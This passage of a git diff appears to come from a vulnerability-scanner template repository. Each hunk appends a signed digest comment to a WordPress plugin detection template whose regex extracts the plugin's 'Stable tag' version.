4a0a00473045022100f411fb1e4f21d4582b0ed0d82e4672e5e15b5134c5945ce93364bc192f980a3302204d6b1cb299cec54537c7c125ef2760c05c850efe686bdd7a955025cccd540390:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 5e6b557952..d50ddcc36d 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009cc177f3409e659c78dae0999eaf984ba009aa440468d582ab6a6f4852a3e904022100968095d7a8822b8e181a48f8d747272b3319574029a8586894d0a7a32d4d1d13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index c5a665e6f7..96816cf693 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f7c798b84b17fad244c5c8781416f14dac9d3890e9708bcf58091f026ab63939022073efdd63ecae80d3bc1206c637bcfdbdfb10ac42a2664b136789f706512fede1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index d86e0557ae..5d0e29cb73 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f8378c63b752139f31f812eaa0400bfdbb80109a6cca08ae9dc4f2524da108a802207505de6b9c31b75040e03f5d43c8c522db0c03fc9feb30f0ef05d467181b2f3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 4e20e57107..08d1224c13 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022031aaeeb0a2ec6e54088b860d3195e1e393c48cdae89373da4beaabb27754e8f7022100f4eba7ceba342e6d5b0ca48da1041da3fe2ee4a463aee33ba3c33e8574266e7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 4ae34395fa..1c04e90fb8 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009fa13c98374aa2fa007cfb3ed671307e40455d25953e5946a3a5d58b882170aa02207ba9db49b1b9abb82ffc535aae2576c9fd1f165f1d242938dcf27f6ff8069afd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2dd0ef57b5..5bbb1c2c9d 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022067795c43581195d4e6a43b398ae1499194b4fb5037ae3adf2739a4957c1969480220226bde90ebdc5eca401cca9f320774210485d6b5d75a77714a25a46e4391ad4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 11942f4fa4..7041c8540f 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b687b83829bdf79b5f0d80431060e7df933781eb09704c743460b42e057cfc48022100dc50685e1fd3264e4396efd9fa7c6314380b2612004fa9aa324f1f3bb4cc597c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 87c2aeb4bd..9242b830ae 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e8e2efe7868fc97ab0dc4ce69442a3ea120a83fe9f25cebf4215f59f2097b1d4022100b4e3f0dcd205ac4f97c383d06c30e7fbea1952d35be58cdd2c403c944f522352:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index aa36122d85..374b2202c1 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f63f73a7e7d1cffef16bfe81bc5f8c9b191960c7285c42322b06c46741fca37b022100c39f1edae713d8542e65cb56398e0b0ad7557cbae6ff118c08a77891ea47b026:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 8bab0a9c3e..737f4022a6 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204ab494d9d5bdf187fd8c55c374e07cdf2c0c3d0d0c421a0ae100acef6231c8070221009f370258920e98ee7e4dcd25c25760786ceaeeebaf0dad5cf93106493ce29938:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index affd270123..328286c8ba 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c8441d14fb05c4392069adc4d67a8deb246d298fce862fd3e315cf83c1ddf40502200c898f8a5dda33a86316bbaef19d0d77787a58e8eed2b51214c24758dbaf12d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 1d00a5705d..02346ee763 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202609cc0f6c988b69a2d0599d9ce5c064eb53a6edae2440d77243bedd9f8f7b53022100f9bc27f785d2f6cb0e6d5921117d37dd6597ea94cbed89007b70ac09802cad4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 980265f531..b92828bc38 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008816c9223b50894c0a803625530488f0a5253e02227e335b8beb64969010c298022002b6c317506f75a311a191173eb711796f2b27ac95bd8a5016fdef6c7ec8db83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index daf205789d..2411ac83fb 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205b94d9411d9fbf77a2b3ca0eb428dc719ec7c9f9b72a485fa215ae97549023e1022060bc5ede931f33639d5bb390c58064c0e04b245c74c42146d8eedd867d0d6576:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 3dbb03067b..ecc3bb3431 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202dbfe379bd137310072dff4cdaf14551d7f097433d33e0c63988969858d80d190220778c3afffd15796da16fe462c9574ffe166ec87a6978fbbd9e2d0349a996587d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 7ed171d662..0ab8decf36 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f30d414d9733a066b3b429ec514f483d5df4b99305ee5c97dd909c02b3fbd1a402207deb18e6e392dba1c44f955c69d32a19de716b71fccfe2bfe779ae407f4ad70a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index ad238445fc..e95e41cc17 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201c4b76dc1e525020dda8d93ea5420d294bea0ec97515277fdc6a1d2a0f9701a7022100d27df3c913a4525c09195844475d8b33e20ca9c2ee48b7de8083066f6bf5089d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 7161671960..1cd63823f7 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f13ac377fe652de4a7a9d0d61026d74850566cf1c0a8843ccc17cf4a009d7694022100920d80498d1b08f0eead2c84462c2854d7f931c9e79a28a739a82f197c6e73c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2678f603c6..b5754581ff 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008af708f4c270caa3c79fe4f7130854e739441c28143a3c889c6d352d3ec6b69202207ebf6dabdeb90f3414336297ab1c32041ec3af39c8861f345a5c2e60c6da8919:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 20d947a5d1..6f4afa1ca5 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220740f6d39a8391754b603d6e9e1a31280274f736a57bc06a41451e11ff45e09fe02200c7125e39912257d04cf5f6f352598151a8c28492f027cc269fae373721fa426:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 22ee97b51f..a20bc1f496 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022053efbecf185228d00a1380734d2693f0b32999c3830bfb1233468adc2d40615c022100ebdcceb5495ed065ee4d7b308ccd8ef66a060857b93cf7b7ec631a110bb03f84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 3f4c6c8936..0767f59121 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a66649f7eed11289997a5fa4eb9108746ac4785014668c445ea459f7b1ca3327022069d02257ef827a94e295fc7db1848ae4cfc65a67b0408f2235b9e903ab8a087c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index fa1bb64115..4d8b580db0 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203706db45bf6533b8f1594a352cf334d33643853448a7d2da0dc933b103f13f1a022100a332f35f9ea42f5ca21c102dc89c460eb8a53b752f30c255a48397f3767a04ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index da63d1cbf6..ed99a8ba87 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204731030f98f1abb3da88ce5b3fd89885dbe4d4d7dec01d6445fb3a2c9c69fcbe022100cfe7e3e21bf528d9d946dc5e0e951808e1081c20e6b2cf9c28adf278ef30fb6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index f94e7f6494..df06d4ef6c 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e44d014f9eb230df8fc4b0018f4646b440bcee265cd7f5d70f99b1bc0557f4ba022100d89ad8dbcd114d2f9f6830f53103360fc63f124901022b38be063d06e941bd35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 95d2aa5f16..203b879180 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c37d19058a798051e30d485d7a246b6fa5b665c05d0e3d2db1f5ebc7f8e1674402200716353d3ce628121f6f7150957ad0b964d0dc065b00298a0007f17363d3889c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index af8193b875..f5ca69b9e2 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022055a2ea3ed70b28b994e63ad104e474066037a3a37061e6a00a8c5e045718526102205a7c0a10f3c5a726aefbebe1385e79669a7c010c2abbe6d3246c26f70a0d6903:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 8d7e45818b..b40389581e 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f64a5eb761a2fee7042f67d47f90bddcef8b7ac018150260f88fec4834457899022100f6eaa6cb10fb1bc58a1408cca9e77311b27321be0ffe89355e3177da413ebf3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ed3967db7b..790b6bae02 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022038a021181d67c4ea1ab5fb123f3ca238c7f96438615d26ecb89eeafc9cbef1f5022100cfa0c3830e41460a7d5263a27c0f5abd4b68108d2df6de1d4951b09cc92291f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index cd248e018b..aa2de7b74a 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204c0df1fc67435a7b677690672a3ec1ff98bf64adee311004cbeb5fec51eb8f5c022100822946c90beffc1debed468be6d10abd90c995bd82a34c3f11521448c4dd8473:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index 0993372ced..9fd4cce480 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210095c6e13736298c0c30f33fc5879098ce0300018420616c1de2fa0397e9cca720022100d179bfaf6aab945c01b44c6fd4ace0688ff7bf81fe3d5274028e8b59793f2cf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 7e62a84cca..0b729f1017 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204570ac2345b960495b2f1b90d44f0f5ae8a26a9f32f1960e9ca84d1481a2e30e02206f4893e310c2fb18ee0a1a0ddd1244d5d2f3d59b85d084ff619715236fb6a472:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 9099f3c0a5..65d5a683a7 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b0a010d2a00a97cca1ba93fc7a556becf9ab2691673edcbae7973c6ac50e6313022058fb42b704685fac9ca4a997b8ea769509460da339338d6c02538cac8899750d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 1ee0e67542..c54ce778e8 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022068e031cd3e3c1a6280c7edb52d53f1b47407b6040319a528fdde0fa5504458cd022100a7c19cb462972fc4665781528b0958ff4c9bdb924211913e5bbb5585716eb13c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index c7ae2d51dd..1f0f5cf4b3 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100872cd10cced7675a70ec4bcc549de31c47c30b0ddf70732b2f8e0a2091dccdfe0220793a1f0aba9d93b926cbdf50d3d8b0bd18049f9fe9df73bbd4377b8e8f8e837f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 7ba81036cf..b85873cef4 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205a52a6321f6f593d0bc777ea7424a5fe6b37857b0fbb80e4264284c422ec193002206ad580848b5cbabcb39081d66db6ed763361ed10f4d0b19ee5b0e85fee9b74e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 24fc3e3295..d5032de770 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220038ed635ed4ce8528d2af99f33e9354c079daea241a24c553374a5c871884b2d02207f47b9bd2fe144e5ef2210792bfb1c0028f7b4d802a4debeb4ee913bfa9c84ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 3e89505574..dd5b9c3e91 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200c17196d875509ae48100e68466451f939079417346e2b5f6f1ccd3343e4b7a8022100b2e053fbc011b4c7829d6b2f5162e605163591bdd5b81015cb3959d86221ac37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e701e365ba..73e2f134d2 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d292ab8ccf46cacf379de98af9066d558e66df8bd654e32016b13efc3bf30e4d022100ce8c95f38f68bb62217cdab00342a63a1a88113d022d68c182935f953382875e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 299e5e4cb6..e7960a23ef 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a046d87295615905d4fc20ba85225ab64f9166bb6551904ee70d68a0b64535b6022100bffebca4bbf3115feed1cbfea50a2706ea8ed2a687d3bf5ce4c734464e897d4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 22687bcffe..0c114541e3 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a757b54cba5c8fafa45b67b18f9ced1ffff96e7ef88158eb37a1bee53c62939602202555b4f6dd28355a07f2148e7d7b19bb6b4f031e80e9d6e162d8beec7c1bf470:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index b69d3d5bfe..0f5e61c1ba 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210089c6872edc9f7dab567f50d59720c9f8b0e08957ee1013d875682e8ad3f2c4c302201962d0cacb8b9e2cc7c4483300db4e5ddd915506d9cc7fe274817963c2eda99f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 7975a57702..016d7021ae 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022008f4b152dd737978caaa2a374e195a951e8d8598fc19c835958fbb73621be2d60221009558129aba39be6cc1c6749ee73e860fbd0336b8f5e793a8995b8331d7541929:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index ff4cef94d7..174a742f70 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201d6aab23d0b3bbb9762b85c12072728087a3410d95a036fe9931b1e90bd41258022100807b528b0baf97762bf84f8dea841ae1e5bae4e5c9d351ed31a6607c02ccc3cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index a8903697b0..4d4e417ae7 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a9053ddad325498ce813bf55aafa196621aa1f437e16bf650a5ed9af27edd97f022100f9e98a0955fc955bf65b74ffe4d365840985e33f63481a9afa73ae17fd909ebf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 3f141c4476..ebb9a8babf 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205bcd2da8e0648f3907a25af323c982f7e33a8eb751c4dae52233165260bfa26002204088e383035e93f1c205071c93554dbd4c7fce1663b2c672690611757010dd53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 5355e988a2..98d80b2801 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 